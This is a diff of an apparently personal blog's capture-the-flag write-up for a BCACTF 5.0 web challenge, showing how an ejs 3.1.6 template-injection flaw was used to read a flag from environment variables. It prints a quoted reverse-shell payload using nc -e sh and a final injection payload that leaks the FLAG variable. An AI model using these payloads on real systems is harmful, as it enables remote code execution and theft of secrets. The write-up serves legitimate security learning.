j4ck4l-24/j4ck4l-24.github.io/source/_posts/BCACTF_5.0_Writeup.md

 ![index](./images/bcactf/duck/index.png)

-* As per the source code the app is a searching enginer for breed and if the breed matches from the list it provides us the summary.
+* According to the source code, the app functions as a search engine for breeds, and if the breed matches an entry from the list, it provides a summary.

-* If we see the .ejs files we can see the breed parameter is simply passed into the page and rendered.
-So ssti was the first though and initially I was trying to modify the `notFound` varaible to false with the help of prototype pollution in the `express@4.18.2` pacakge as breed gets rendered only when `notFound` = `false`.
-But this approach failed.
+* By examining the .ejs files, we can see that the breed and summary parameters are simply passed into the page and rendered.
+This led me to initially consider SSTI (Server-Side Template Injection).
+I first attempted to modify the `notFound` variable to false through prototype pollution in the `express@4.18.2` package, since the breed only gets rendered when `notFound` is set to `false`.
+However, this approach failed.

-* The next interesting part is the package `ejs@3.1.6`.
-It is vulnerable to ssti and here is the poc available online.
-[POC](https://eslam.io/posts/ejs-server-side-template-injection-rce/)
+* Another intriguing aspect is the `ejs@3.1.6` package.
+It is vulnerable to SSTI, and here is a POC available online: [POC](https://eslam.io/posts/ejs-server-side-template-injection-rce/)

 ```js
 settings[view options][outputFunctionName]=x;process.mainModule.require('child_process').execSync('nc -e sh 127.0.0.1 1337');s
 ```

-* This was the payload available in the poc but the challenge had no network access so we can't get reverse shell.
+* This was the payload available in the PoC, but the challenge had no network access, so we couldn't get a reverse shell.

-* But we can see in the poc the `__append` function can be used to render something back on the html.
+* However, in the PoC, we observed that the `__append` function can be used to render something back in the HTML.

-* Hence we used this approach to get the flag.
+* Therefore, we used this approach to retrieve the flag.

 ```
 Final Payload = breed=Pekin&settings[view options][outputFunctionName]=x;var flag = Deno.env.get('FLAG');__append(flag);s
 ```